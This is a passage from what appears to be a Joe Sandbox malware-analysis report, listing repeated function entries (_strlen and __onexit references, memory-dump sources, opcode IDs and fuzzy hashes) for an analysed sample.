                            • Instruction Fuzzy Hash: BCC04C1259A5202D398932953C17DEF024E8D57320B16206FBA40695D25C892D8141FF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00402B7D
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: aae45fff1cfec1ad8b86594c938f9c4d624e26556faed596edbb6332c6f3f83b
                            • Instruction ID: 4f5c75626164dbfafd80348b99963ab7a9d84dd1f5d8ec61549205f2f7f59819
                            • Opcode Fuzzy Hash: aae45fff1cfec1ad8b86594c938f9c4d624e26556faed596edbb6332c6f3f83b
                            • Instruction Fuzzy Hash: 11C04C5299E5202D394932657817DEE124E8D57320B16117FFA40655D35C892D8182FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040CB23
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: a219d6abba44a0c877b2e698ac9b0b90e113d49de145b7f6210ef60f60c7d53a
                            • Instruction ID: 531aef82cc003a45f3d6309ecc600574b307fd2a97c03e21a80bdfbb73218b3a
                            • Opcode Fuzzy Hash: a219d6abba44a0c877b2e698ac9b0b90e113d49de145b7f6210ef60f60c7d53a
                            • Instruction Fuzzy Hash: 10C04C6259E5202D3D4933953907DEA028E8D57330B16107FF641655D25D883D8141FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040ABB6
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: a327130f60b70a038e6bd4de18ef329e430df2eed01d8d5916acc96f7d540698
                            • Instruction ID: fd8eaf1fce6ce899814d2ce77275db4dd5cac19f9901057d6998bcb7c5abf39e
                            • Opcode Fuzzy Hash: a327130f60b70a038e6bd4de18ef329e430df2eed01d8d5916acc96f7d540698
                            • Instruction Fuzzy Hash: 59C04C529DA5202D394933A53807DEE025E8D96320B16106FB540655D25D992C8181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00409005
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: ed5df22c5770f1f7052bba06b713cbd042dd309d674880aba281835f2c03e1c6
                            • Instruction ID: fff324d0faf7d8b0d14dcd6155d2c71b54e2705f0ba7604b252d380fc4553fc4
                            • Opcode Fuzzy Hash: ed5df22c5770f1f7052bba06b713cbd042dd309d674880aba281835f2c03e1c6
                            • Instruction Fuzzy Hash: F8C04C125AE5206D394932653D07DEA024E8D56720B16106FF545655D65C893C8141FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00405274
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: 2b722d22888fccaf6d67b09def4e3245dab8fb5d0f5d73363e7aeef3bfcd70c2
                            • Instruction ID: e266af1bf60833dd135b2964f202bcab8b80facd9f0f7c2e15cfabd8b8876539
                            • Opcode Fuzzy Hash: 2b722d22888fccaf6d67b09def4e3245dab8fb5d0f5d73363e7aeef3bfcd70c2
                            • Instruction Fuzzy Hash: C2C04C12D9A5202D394933A9380BDEA024E9D57360B16106FF540A55D25C892D8142FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040D3EE
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: 6e47198b3b15e4d11b8637fa656fc39514c672150d9eacd72aab78a0802c5ead
                            • Instruction ID: 8d93459c49d6af7b25c8a4b4c202fd9f8707758037e8c628de551d446fba8bf7
                            • Opcode Fuzzy Hash: 6e47198b3b15e4d11b8637fa656fc39514c672150d9eacd72aab78a0802c5ead
                            • Instruction Fuzzy Hash: 59C04C125AA5212D3D4933A53807DEA024E8D97320B26107FB641A59D25C882D8141FF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040B481
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: ed0bf9d93cf3c5cc9887b99ceec143c03be6e51b922294ff018082971735484b
                            • Instruction ID: 5b22846f854b49fb38c1f477b0dd8c63ec913540427ac75266d689f0d58e517d
                            • Opcode Fuzzy Hash: ed0bf9d93cf3c5cc9887b99ceec143c03be6e51b922294ff018082971735484b
                            • Instruction Fuzzy Hash: 1CC04C1299A5206D395933653817DEE024E8D96320B16107FF541A69D35D992C8141FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004034F0
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: 20e54348b26474a6a9e32087afe74f8c67c28a4a3957b4d219c9ebec82fd8813
                            • Instruction ID: b1944bd9225a8aa413123696bc0613764c06176728732efb393501e9ef0666f4
                            • Opcode Fuzzy Hash: 20e54348b26474a6a9e32087afe74f8c67c28a4a3957b4d219c9ebec82fd8813
                            • Instruction Fuzzy Hash: 7CC04C1259A5206D394932553807DEA024E8D97320B16107FF6406A5D25C892C9142FE
                            Uniqueness

                            Uniqueness Score: -1.00%